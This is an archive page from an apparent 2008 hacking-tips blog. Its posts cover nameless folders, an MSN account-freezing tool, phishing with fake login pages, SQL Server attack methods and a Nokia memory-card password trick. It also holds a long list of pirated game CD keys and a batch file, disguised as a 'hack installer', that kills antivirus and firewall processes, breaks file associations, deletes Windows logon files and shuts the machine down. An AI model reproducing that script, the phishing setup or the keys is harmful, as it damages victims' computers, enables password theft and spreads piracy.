Archive for September, 2008

create folder and files with no names

{ September 7, 2008 @ 9:59 am } · { hacking tips }
{ } · { Leave a Comment }

This trick will allow you to create files and folders without any name.

Just follow the following steps:
1.Select any file or folder.
2.Right click on it, press rename or simply press F2.
3.Press and hold the alt key. While holding the Alt key, type numbers 0160 from the numpad.

Note: Type the numbers 0160 from the numpad, that is, the numbers present on the right side of the keyboard. Don’t type the numbers which are present on top of the character keys.

4.Press Enter and the nameless file or folder will be created.

Reason: The file or folder that seems nameless is actually named with a single space.

But what if you want to create another nameless file or folder in the same directory ?

For this you will have to rename the file with 2 spaces. Just follow these steps below:

1.Select file, press F2.
2.Hold alt key and type 0160 from the numpad.
3.Release the alt key. Now without doing anything else, again hold alt key and press 0160.
4.Press enter and you will have second nameless file in the same directory.
5.Repeat step 3 to create as many nameless files or folders in the same directory.

(we’ve had a problem with deleting these folders, to do so, start your computer in safe mode and delete it from there.)

8 Comments »

Ice Cold Reloaded

Posted in Easy Hacking, Email, Hotmail with tags , , , , on April 5, 2008 by hacktocrack

MSN Passport Account Freezer and (De)Freezer [basically just stops freezing]. It gives you the ability to prevent a person from signing into MSN Messenger, or his/her hotmail inbox. It includes support for the latest MSN Messenger Protocol.

Download Link http://download.download-free-software.net/IceCold_ReLoaded

protect yourself from fake login pages

{ September 7, 2008 @ 9:57 am } · { game cd keys }
{ Tags: } · { Leave a Comment }

Using fake login pages is the easiest way to hack passwords. Identifying a fake login page is very easy but many people neglect to do some small checks before entering the login details and fall in the trap. I have seen a person paying 500$ for a fake login page of paypal. This proves that there are still people falling in this trap. This is just an example, there are many fake websites of banks, yahoomail, gmail,orkut,myspace etc …
This post is an attempt to show what a hacker does to hack your password using fake login pages and how to protect yourself from those fake logins.I will try to keep this post as simple as possible, there may be some technical details which you can safely skip.
Warning: I strongly advice you not to try this on anyone it may spoil your relation with the person on whom you are trying it and you may even end up behind the bars.


What goes on behind when you enter your login details in login form??

When you enter your login details in any login form and hit enter they are submitted to another page which reads these login details and checks the database if you entered the correct username and passowrd, if yes then you will be taken to your account else you will get an error page.
What an hacker does??

A hacker creates a fake page which looks exactly same as the original page and some how tricks you to enter your login details in that page. These login details are then submitted to a file.At this stage the hacker has two optionsHe can either store the login details on his server or he can directly get them mailed to his email id. All the above said things happen behind the scenes, you will have no clue of it. When you enter you login details for the first time your details are submitted to the hacker and you will be directed to a error page ( this is the original error page). When you enter ur login details again you will be logged in to your account. It’s quite common for us to enter the login details wrongly sometimes so you will not become suspicious when you get the error page.

How to identify fake login page traps ??

  1. Never enter you login details in unknown sites.
  2. Always type the address directly in to the browser.
  3. Do not follows the links you get in mails and chatting even if they are from your friends
  4. Always have a keen look in the address bar and verify if the address is correct. Check the screen shot below. Some people buy doamins which look simliar to the original site example: 0rkut for orkut, pay-pal for paypal,yahooo for yahoo. Some times you may over look these small differences and fall in trap.
  5. Please do report to the hosting site or the original site owner when you find a fake login page.
  6. If you feel like you entered your details in a fake login page change your password immediatley.

Now let’s go on with the trick..

You have to upload the fake login page on some server with php support. There are many free web hosting services available on the net, first sign up for anyone of them.Google for some free webhosting services,you will find many. Upload the files in the zipped folder on to your server and give the link of the fake login page to the person whose password you want to know. When the person enters his email id and password in to the fake login page they will be stored in a HTML file named “passwd.htm” on your server in the same directory where you uploaded the login page.  Check that text file to get the passwords you wanted.

Here is the demo of the trick

Note:Don’t enter your actual password


game cd keys

{ September 7, 2008 @ 9:53 am } · { game cd keys }
{ } · { Leave a Comment }

1503 A.D. The New World serial: 0705-7933859-6725970-0015
Age Of Mythology br Serial: P3HM4-WDM27-662XW-9BPTV-CFVMQ
Al Qaeda Hunting 3D serial: 23822
Back and White Br serial : 0901-3324366-4702210-2081
Battlefield 1942 Serial : 5000-0000000-0000000-1318
Battlefield 1942: Secret Weapons of WWII: 2gyy-3wlk-8btf-wjur-g277
Battlefield Vietnam: V2W6-54VJ-9R11-XJPV-79CM
Battlefield 2: TW99-NWBV-0PVZ-EAEI-JVTL
BLACK & WHITE BR – 0901-3324366-4702210-2081
Black & White: Creature Isle serial: 1740-9488245-5171152-1858
Chrome (c) Take 2: XTITY-92Y9L-MGPVA-KJ4Z6
CLIVE BARKER’S UNDYING – 2500-0911911-0911911-2705
Comanche 4 serial: 3s2d-flt1-cls2-rule-7865
Command & Conquer Generals: Zero Hour Expansion:
ULPF-ZEVK-FRWG-Q4YJ-6F2T
Command & Conquer: Renegade serial: 056894-929488-118387-9679
COMMAND E CONQUER GENERALS SERIAL: 4963-7882913-5984076-0674
Copa do Mundo FIFA 2002 BR SERIAL: 5500-5827167-6713862-1708
Dark Reign 2 CD Key : GAR3-RAB8-FUP9-NYZ7-2832
Dead Man’s Hand S/N: DEVB-Q7S3-Z5T8-ZGE8-AZ84-JT3K
Delta Force 3: Land Warrior – s/n: N5E3-YXH2-G983-9WYB-B3ZS
Delta Force 4: Task Force Dagger serial: 72YL-R4SB-GKG6-3WKS-HQ27
Delta Force 5 Black Hawk Down serial: QF7S-HZMK-XLXP-CUJN-HDTZ
Delta Force Black Hawk Down: Team Sabre (Expansão)
Delta Force Xtreme: DFX-WESTIL-LKICKY-DULASS-ANYDAY
Serial: AV4E-YVQE-NACM-DD3M-KBW3
DELTA FORCE: LAND WARRIOR – N33G-6HM2-9Y8F-HD4U-M7S9
Devastation_CDKEY: 5B36F-976AA-6A471-58B8D-92B7B
DOOM 3 CD Key: VB44-6BWV-H6UZ-RRPE-5E
Dominius II Serial: 1111-1111-1111-064
Earth 2150 : Lost Souls Serial : 7XJC-UD2E-E83L-Z5T5
Emperor: Rise of the Middle Kingdom Serial : BAC9-RAL8-SAS2-SAX2-9999
Empire Earth: Art of Conquest Serial : GER2-MAN2-RAP2-PER5-2252
F1 2002 SERIAL: 7931-9865028-6024865-1156

F1 champiship season 2000 serial: 2000-5005241-5005241-6839
FA_Premier_League_Manager_2002: 4507-1863659-3033569-5650
FIFA 2003 BR: BL7G-929A-2YXE-UFZZ
FIFA SOCCER 06: ON99-FLZU-9DEV-WTFM-6DEV
Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS
FREEDOM FORCE: 1439-8808778-3837107-2854
Frontline Attack – War over Europe SERIAL: FUBP-EYNZ-KFXC-SKM2
Galactic Civilizations With Bonus serial: DN-500792-GC1-CLS4FLT8XT
GLOBAL OPERATIONS: 5000-0000000-0000000-5021
Ground Control Serial : RAC2-RAL2-CAS3-RAD3-3542
half life couter strike serial: 2462-92319-7642
half life edição especial:UCF1840810021327
half life opposing force serial: 2708-43011-3332 ou UCF1840810021327
HALF LIFE: UCF1840810021327
HALF-LIFE – 2420-92220-4482
HALF-LIFE: COUNTER-STRIKE – 2462-92319-7642
HARRY POTTER : 0901-7014788-4117807-0206
Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV
HARY POTER E A CAMERA SECRETA SERIAL: 7954-3123341-1387427-3052
Heli Heroes – serial: 8bnk-c9eh-63hb-kj88
Hidden and Dangerous 2: 1234-5678-9abc-dddf
Homeworld 2 (c) SIERRA: NAS3-DEC2-BYJ5-CUJ6-8385
homeworld: BAB2-BAB2-CEZ8-TAC3-9978
Hoyle_Majestic Chess: XYN6-NAB4-FES2-MUX7-3485
IGI 2 COVERT STRIKE SERIAL: 031F-F8D0-6536-B510
James Bond 007: NightFire Serial : 1740-9488245-5171152-5578
Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537
Kelly Slater Pro Surfer Serial: 0f162xa28pg34dhc
Kingdom Under Fire Gold Edition serials: E3VI FP69 HT79 5KVG
Lego Soccer Mania serial: 1500-0776239-9370523-4726

madden nfl 2001: 1500-6610360-1643530-0243
Madden NFL 2004: VMZ9-JXRC-AZOR-J000-1911
Madden_NFL_2002_ CDKEY enter: 0901-5445152-2745753-4827
Medal Of Honor Allied Assault Breakthrough: L5KB-32WY-B6G5-6747-YQ49
Medal of Honor: Allied Assault CD Key, enter 5000-0000000-0000000-5068
MEDAL OF HONNOR: ALLIED ASSAULTKey: 7931-9865028-6024865-9663
Microsoft Flight Simulator 2002 – Airport 2002 Volume 1serial use:
A221-A24AABAA-FDBA5DD9
Moto Racer 3: 54e9-a751-1da8-e109-efb3-51f9-d90f-75d0-

2250
MVP Baseball 2003 CD Key: JNXC-PAPN-KR96-MY5P
nascar 2002 SERIAL: RAF2-RAL2-RAS2-RAX2-6667
NASCAR RACING 4 – GAC7 REB8 TUX6 DAC2 7833
Nascar Thunder 2003 serial: NASC-ARTH-UNDE-RJAM
Nascar Thunder 2004: CLZH-PE48-R9RR-G9ZT-9DSW
NBA LIVE 2001 – 2001-0020601-0010978-6694
NBA Live 2001 CD Key: 2001-0020601-0010978-6694
NEED FOR SPEED 2003: HOT PURSUIT 2 serial: 8249-7EE3-84EW-TXGT
Need For Speed: Underground s/n: SQZZ-2Y44-8AS4-7QSQ-YDEV
Neverwinter Nights serial QFETM-MPU3X-DN6FF-MHFDA-YWARA-4HMPE-RDJTG
NHL 2002: 1000-2003004-0000000-4904
NHL 2004: 6T22-8L62-6666-8666-6666
O.R.B:SERIAL: JTRV74NVVKUJX7AM
Operation Flashpoint Gold Upgrade Red Hammer serial M3CZ P5186 XNEYL
CL0T7 513NT
OUT LIVE BR: c9523c-1a4466-237cb8-dc7e67
Pro Evolution Soccer 5: NXUD-PACV-EM2X-KPC9-6AYUQUAKE III Arena – THWT37AB3P7JBTPC
QUAKE III Team Arena – TSBH 7CCG DPWP B2LT 84
QUAKE IV: 9TFP-TXCG-XFMM-XXR9-9DGT
Return to Castle Wolfenstein CD Key: CLAL-A7WJ-DTSJ-WARP-88
Rise of Nations:RXVC3-B3347-DVG9X-FTFQF-9M7XT
Roller Coaster Tycoon 3 serial: RLDU-M24D-83CX-C8LZ-WDHS-ETND
S.W.A.T. 3 – Elite Edition – TED4-SAB4-DUB7-CYJ2-8652
Sacrifice serial: xxxx-xxxx-xxxx-xxxx
Sail Simulator 4.2 Serial : SS42-V7CGQ-9BCGM-4C326-JW25C
Savage: The Battle for Newerth: LB42-Z05V-VK9S-I7BM-58S5
Sega GT Serial : GTJ08010-322007-01723
Serial do Tiger: 1500-3202255-2068109-2932
Shogun 2: CDKEYS = 0901-3721384-6427058-7026
Shogun Total War Serial : 1600-0052410-0052410-6424
SIM CITY 3000 UNLIMITED BR – 5001-9781634-6520278-1000
Sim City 4 Rush Hour *MULTI*: CLC4-5ZU8-6C4S-9W46-LS4E
simcity 4 serial: GRUS-4528-8217-1ULF
Simcoaster serial : 2001-0013101-0010978-2823
SIMGOLF: 5000-0000000-0000000-5071
SOLDIER OF FORTUNE 2: 3Z4J – J3PP – K848 – EWPK – 1F
SOLDIER OF FORTUNE GOLD – BEN6-MUC8-BEZ6-BUJ6-3764
Spell Force: 08AFX-CGGML-W260D-5RRP0-CVNFD
Spy Hunter Serial: SHU3E7RVCCRBFHSS
Star Trek Elite Force 2 – TFAK-7WCH-44RH-YJ7X-F9E9
Star Trek StarFleet Command : Orion Pirates Serial :
4008-B491-1DC3-0F6C
starfleet command 3 serial: 0000-0000-0000-K28K
STARTRECK: RYS8-LAB4-JEF8-BYM3-4652
Sub Command: Seawolf-Akula CDKEY: 0901-1315206-2102812-3248
SUPERBIKE 2001 – 1500-4288423-2982915-3163
Team Factor SERIAL: 2NKZYY9-2SKAKSC
Terminator 3: Rise of the Machines Serial: TTDA-H8VW-KJDV-NNKA

THE SIMS BR – 100486-585530-905808-0928
THE SIMS DELUXE BR SERIAL: 5500-5782961-4067120-2138

5500-7457886-5179416-4991
throne of darkness serial : RAC2-RAD2-RAC2-RAC2-3387
Tiger Woods PGA Tour 2002 serial: 5000-0000000-0000000-5045
TIGER WOODS PGA TOUR 2003 SERIAL: FLTR-0825-9192-1RLC
Tony Hawks Pro Skater 4: P4EPBTIQDAIH7WXM
Total Club Manager 2003 serial : 1500127097911060657818
Train Simulator – The Activities Serial: 6850-YV6AYS6B
Trainz serial, enter: RAZO-R9XI-XXXC-XXXT-XXGX-1911
Tron 2.0 (c) Disney Interactive: 9393-L9CN-PRTB-T7N4-5858
Universal Combat Serial: 2B46-97F6-OF33-99BB “Atenção o O podera ser
um 0″
Unreal Tournament 2003 Serial : LYR22-RZ743-A9D7T-CNNEN
War! Age of Imperialism: 1101-8603-2629-7418

Lord of the Rings: War of the Ring: XUF5-JUB2-JAB8-JUD3-4947
Lord Of The Rings The Return Of The King: s/n: TMXF-Q23L-LCEG-Y9WW-V94G
Harry Potter: Quidditch World Cup: 3FJA-LVDF-DAJP-34HR-RDEV
MSEE-5EL4-WYBB-DGLU-GDEV
6Q7F-WAAC-8QTH-WLC4-EDEV
Q3N6-2X4N-A4EA-NY64-GDEV
GJGQ-4SLL-EA4Y-FJSU-UDEV
5LM5-M22H-45YT-W88Z-2DEV
C6U4-7A49-4CE2-MUGL-8DEV
BH4U-GCNX-WMJ8-ZGKY-4DEV
KAU4-AVFV-34AK-782Y-4DEV
Y3QQ-TUGW-4NU4-ZG68-6DEV
Hidden and Dangerous 2: 1234-5678-9abc-dddf
Pinnacle Instant Video Album V1.01 Multilanguage: 7777777777
The Sims Num Passe de Magica: U9BK-8XSP-YAG4-WYL4-SDEV
PSB3-DLW5-3GPV-P8BU-HDEV
Judge Dredd: Dredd Vs. Death: NUN6-GAB2-TAX7-ZYG6-3537
CIVIL 3D V2004: 400-00000000
War! Age of Imperialism: 1101-8603-2629-7418
Freedom Fighters: PQGY-4FAQ-TMQ5-Q4X8-KXCS
Cakewalk MediaWorks Serial: CWMW1.00-009968
Neato MediaFace Serial: 7135be-1339bd-1a33-5c670
NHL 2004: 6T22-8L62-6666-8666-6666
FQ22-BXTP-FLT!-ELT!-FLT!
CHYQ-AVKH-CRKD-GRKD-CRKD
BZ8G-WCOL-L8JD-SUXM-LTBV
A75V-8YSW-JQ75-NE79-LC4W
ZZGY-JQVB-PJ4T-6K6K-4INY
B233-BN2E-BUL3-87C5-4YZA
AWZH-HVNV-P8FK-XHPQ-8EUJ
J4LL-PZID-QZEM-RPQ2-UHRF
RKRR-R3C4-QWP8-QUXI-96KC

exploit sql server system

{ September 7, 2008 @ 9:13 am } · { Uncategorized }
{ } · { Leave a Comment }

Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.

1. Direct connections via the Internet

These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield’s Port Report shows just how many systems are sitting out there waiting to be attacked. I don’t understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.

2. Vulnerability scanning

Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.’s NGSSquirrel for SQL Server (for database-specific scanning). They’re easy to use, offer the most comprehensive assessment and, in turn, provide the best results. Figure 1 shows some SQL injection vulnerabilities you may be able to uncover.

Figure 1: Common SQL injection vulnerabilities found using WebInspect.

3. Enumerating the SQL Server Resolution Service

Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews’ SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren’t listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.

4. Cracking SA passwords

Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.

5. Direct-exploit attacks

Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.

Figure 2: SQL Server vulnerability exploitable using Metasploit’s MSFConsole.

6. SQL injection

SQL injection attacks are executed via front-end Web applications that don’t properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually — if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics’ SQL Injector, shown in as

Figure 3: SPI Dynamics’ SQL Injector tool automates the SQL injection process.

7. Blind SQL injection

These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn’t receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that’s where Absinthe, shown in Figure 4, comes in handy.

Figure 4: Absinthe tool takes the pain out of blind SQL injection testing.

8. Reverse engineering the system

The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you’ll find a discussion about reverse engineering ploys.

9. Google hacks

Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors — such as “Incorrect syntax near” — leaking from publicly accessible systems. Several Google queries are available at Johnny Long’s Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google’s ’site:’ operator often turns up juicy info you never imagined you could unearth.

10. Perusing Web site source code

Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.


how to unlock password …………

{ September 7, 2008 @ 8:43 am } · { Uncategorized }
{ } · { Leave a Comment }

Posted in Easy Hacking, Mobile hacking with tags , , , , , , , , , , , , on August 18, 2008 by hacktocrack

Well its quite simple but most of the people do not know it.

Please note the fact that it only works if the password to the MMC Card was set in ur own mobile,where u want it to be unlocked.

This method works well for nokia cells with symbian operating system.Never tried on other cells.use any software like FXplorer that can browse files in ur cell.

1. Open one of above software you have.
2. Browse through the directory, C:\system
3. Rename the file mmcstore to mmcstore.txt
4. Open the file – The file will open in Notes.
5. You will find your password in that file. That file would also contain much more data which you do not understand,so you need to go through the file to get the password!

When ur cell is connected to pc by means of data cable or bluetooth,u can see the password by simply opening the file mmcstore with notepad.


fool some one that he is installing hack

{ September 7, 2008 @ 8:38 am } · { Uncategorized }
{ } · { Leave a Comment }

Posted in Easy Hacking, cmd, hacking on August 20, 2008 by hacktocrack

Just Copy This Code Below In Notepad, Save as installhack.bat and you are done!

This Hack will:

1. End Process, NAVAPSVC.exe
2. End Process, Explorer.exe (taskbar and icons will dissapear)
3. End Process, zonelabs.exe
4. associate a exe file with txt (when opening exe files, it will go to notepad)
5. associate a txt file with mp3 (when opening txt files, it will open WinAmp or WMP)
6. Deletes Login/Logoff Screens

************************************************************************************

title Hack Setup
color 0A
@echo off
set end=md “Hack installing”
set fin=copy “Hack log.txt” “Installing”
%end%
%fin%
net send * Hack is installing, press OK to begin set up.
kill NAVAPSVC.exe /F /Q
kill zonelabs.exe /F /Q
kill explorer.exe /F /Q
cls
assoc .exe=txtfile
assoc .txt=mp3file
cls
msg * It is you who is hacked….
msg * I warned you, and you kept going. Challenge me and this is what
DEL C:\WINDOWS\system32\logoff.exe /F /Q
DEL C:\WINDOWS\system32\logon.exe /F /Q
DEL C:\WINDOWS\system32\logon.scr /F /Q
cls
shutdown

**************************************************************
happens.
Please Do NOT Try This Yourself!

I will NOT Be Held Responsible for this!